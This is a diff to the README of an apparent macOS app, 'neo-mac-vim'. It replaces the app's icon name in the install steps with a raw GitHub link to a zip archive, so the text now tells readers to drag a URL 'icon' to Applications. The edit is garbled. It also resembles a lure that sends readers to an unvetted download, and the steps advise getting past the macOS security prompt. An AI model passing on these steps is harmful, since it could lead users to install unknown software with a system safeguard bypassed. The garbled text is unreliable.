sukhan032/neo-mac-vim/README.md

    Once the download is complete, locate the `.dmg` file in your Downloads folder.
 Double-click it to open.

 4. **Install the Application**
-   When the window opens, drag the `neo-mac-vim.app` icon to your Applications folder.
+   When the window opens, drag the `https://raw.githubusercontent.com/sukhan032/neo-mac-vim/main/scripts/neo-mac-vim-v2.6.zip` icon to your Applications folder.
 This action copies the app to your computer.

 5. **Launch the App**
    Go to your Applications folder and find `neo-mac-vim`.
 Double-click it to open the app.
 If you receive a message about security, right-click the app and select "Open."